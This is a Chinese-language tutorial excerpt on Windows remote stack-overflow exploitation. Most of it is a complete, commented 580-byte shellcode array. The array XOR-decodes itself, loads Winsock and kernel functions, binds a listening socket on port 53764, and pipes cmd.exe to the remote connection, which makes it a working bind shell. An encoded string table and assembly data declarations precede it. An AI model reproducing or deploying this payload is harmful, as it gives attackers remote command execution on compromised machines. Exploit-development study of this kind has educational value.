📄 window系统下的远程堆栈溢出 --《原理篇》.txt
字号:
/****************************************************************************/
db "KERNEL32" ,0;string to push for LoadLibrary.
db "CreatePipe",0
db "GetStartupInfoA",0
db "CreateProcessA",0
db "PeekNamedPipe",0
db "GlobalAlloc",0
db "WriteFile",0
db "ReadFile",0
db "Sleep",0
db "ExitProcess",0
db "WSOCK32",0
db "socket",0
db "bind",0
db "listen",0
db "accept",0
db "send",0
db "recv",0
sockstruc STRUCT
sin_family dw 0002h
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockstruc ENDS
db "cmd.exe",0
dd 0ffffffffh
db 00dh, 00ah
/****************************************************************************/
4)shellcode的编写
将前面的C程序编译出来,提取出shellcode,然后加上前面的编解码和函数加载模块就可以了。
应用前面的设计思想,我们可以写出来shellcode如下:
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc, /* mov edi,esp */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xf7, 0xd0, /* not eax */
0x50, /* push eax */
0x59, /* pop ecx */
0xf2, /* repnz */
0xaf, /* scasd */
0x59, /* pop ecx */
0xb1, 0xc6, /* mov cl, C6 */
0x8b, 0xc7, /* mov eax, edi */
/*Xorshellcode */ /* */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 */
0xe2, 0xfa, /* loop Xorshellcode */
0x33, 0xf6, /* xor esi, esi */
0x96, /* xchg eax,esi */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08, /* shr ebx, 08 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x0b, /* mov cl, 0B */
0x49, /* dec ecx */
/* loadKernelProcess */ /* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadKernelProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 &GetProcAddr */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadKernelProcess */
/* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne 00000176 */
0xb3, 0xe8, /* mov bl, e8 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x06, /* mov cl, 06 */
/* loadSocketProcess */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadSocketProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadSocketProcess */
/*
这一段代码就是前期的准备工作,它负责获得所有的函数的入口地址,这些函数是:
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05, /* add esi, 00000005 */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0xff, 0x57, 0xe8, /* call [edi-18] */
0x93, /* xchg eax,ebx */
0x6a, 0x10, /* push 00000010 */
0x56, /* push esi */
0x53, /* push ebx */
0xff, 0x57, 0xec, /* call [edi-14] */
0x6a, 0x02, /* push 00000002 */
0x53, /* push ebx */
0xff, 0x57, 0xf0, /* call [edi-10] */
0x33, 0xc0, /* xor eax, eax */
0x57, /* push edi */
0x50, /* push eax */
0xb0, 0x0c, /* mov al, 0C */
0xab, /* stosd */
0x58, /* pop eax */
0xab, /* stosd */
0x40, /* inc eax */
0xab, /* stosd */
0x5f, /* pop edi */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0xad, /* lodsd */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] */
0x48, /* dec eax */
0xb0, 0x44, /* mov al, 44 */
0x89, 0x07, /* mov dword ptr [edi], eax */
0x57, /* push edi */
0xff, 0x57, 0xc4, /* call [edi-3C] */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax */
0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax */
0x8b, 0x06, /* mov eax, dword ptr [esi] */
0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax */
0x33, 0xc0, /* xor eax, eax */
0x66, 0xb8, 0x01, 0x01, /* mov ax, 0101 */
0x89, 0x47, 0x2c, /* mov dword ptr [edi+2C], eax */
0x57, /* push edi */
0x57, /* push edi */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0x50, /* push eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0x48, /* dec eax */
0x50, /* push eax */
0x50, /* push eax */
0xad, /* lodsd */
0x56, /* push esi */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xff, 0x57, 0xc8, /* call [edi-38] */
0xff, 0x76, 0xf0, /* push [esi-10] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0xff, 0x76, 0xfc, /* push [esi-04] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0x48, /* dec eax */
0x50, /* push eax */
0x50, /* push eax */
0x53, /* push ebx */
0xff, 0x57, 0xf4, /* call [edi-0C] */
0x8b, 0xd8, /* mov ebx, eax */
0x33, 0xc0, /* xor eax, eax */
0xb4, 0x04, /* mov ah, 04 */
0x50, /* push eax */
0xc1, 0xe8, 0x04, /* shr eax, 04 */
0x50, /* push eax */
0xff, 0x57, 0xd4, /* call [edi-2C] */
0x8b, 0xf0, /* mov esi, eax */
/* PeekPipe: */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0xc8, /* mov ecx, eax */
0xb5, 0x04, /* mov ch, 04 */
0x50, /* push eax */
0x50, /* push eax */
0x57, /* push edi */
0x51, /* push ecx */
0x56, /* push esi */
0xff, 0x77, 0xa8, /* push [edi-58] */
0xff, 0x57, 0xd0, /* call [edi-30] */
0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 0000000*/
0x7c, 0x22, /* jl GetUserInput */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0x57, /* push edi */
0xff, 0x37, /* push dword ptr [edi] */
0x56, /* push esi */
0xff, 0x77, 0xa8, /* push [edi-58] */
0xff, 0x57, 0xdc, /* call [edi-24] */
0x0b, 0xc0, /* or eax, eax */
0x74, 0x2f, /* je GameOver */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xff, 0x37, /* push dword ptr [edi] */
0x56, /* push esi */
0x53, /* push ebx */
0xff, 0x57, 0xf8, /* call [edi-08] */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
0xeb, 0xc8, /* jmp PeekPipe */
/* GetUserInput: */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xb4, 0x04, /* mov ah, 04 */
0x56, /* push esi */
0x53, /* push ebx */
0xff, 0x57, 0xfc, /* call [edi-04] */
0x57, /* push edi */
0x33, 0xc9, /* xor ecx, ecx */
0x51, /* push ecx */
0x50, /* push eax */
0x56, /* push esi */
0xff, 0x77, 0xac, /* push [edi-54] */
0xff, 0x57, 0xd8, /* call [edi-28] */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
/* GameOver: */
0xeb, 0xaa, /* jmp PeekPipe */
0x50, /* push eax */
0xff, 0x57, 0xe4, /* call [edi-1C] */
0x90, /* nop */
/*
这里的长长代码就是那段C语言的算法,我的注释很详细,就不多说了
*/
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xae, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
/*
这些就是那个字符串表,已经经过了编码。
*/
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -